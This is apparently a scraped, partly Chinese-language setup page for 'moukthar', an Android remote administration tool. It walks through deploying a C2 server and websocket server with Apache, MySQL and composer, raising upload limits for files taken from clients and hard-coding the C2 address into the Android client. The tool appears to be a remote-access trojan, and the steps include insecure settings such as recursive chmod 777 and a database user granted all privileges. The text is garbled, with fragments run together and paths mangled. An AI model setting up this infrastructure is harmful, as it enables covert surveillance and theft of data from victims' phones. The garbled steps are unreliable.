moukthar
1.0.0
Android的远程管理工具
git clone https://github.com/Tomiwa-Ot/moukthar.git/var/www/html/并安装依赖项 mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web-socket/
composer install
cd /var/www
chown -R www-data:www-data .
chmod -R 777 .android和密码: android CREATE USER ' android '@ ' localhost ' IDENTIFIED BY ' your-password ' ;
GRANT ALL PRIVILEGES ON * . * TO ' android ' @ ' localhost ' ;
FLUSH PRIVILEGES;c2-server/.env和web-socket/.env中设置数据库凭据database.sql php Server/web-socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service/etc/apache2/sites-available/000-default.conf <VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html/c2-server
DirectoryIndex app.php
Options -Indexes
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
/etc/apache2/apache2.conf Comment this section
#< Directory />
# Options FollowSymLinks
# AllowOverride None
# Require all denied
#</ Directory >
Add this
< Directory /var/www/html/c2-server>
Options -Indexes
DirectoryIndex app.php
AllowOverride All
Require all granted
</ Directory >/etc/php/*.*/apache2/php.ini * .*/phpache2/php.ini ; Increase size to permit large file uploads from client
upload_max_filesize = 128M
; Set post_max_size to upload_max_filesize + 1
post_max_size = 129Mc2-server/src/View/home.php和c2-server/src/View/features/files.php中设置<script>标签中的Web套接字服务器地址。 const ws = new WebSocket('ws://IP_ADDRESS:8080'); sudo a2enmod rewrite && sudo service apache2 restartfunctionality/Utils.java中设置C2服务器和Web插座服务器地址 public static final String C2_SERVER = "http://localhost" ;
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080" ;







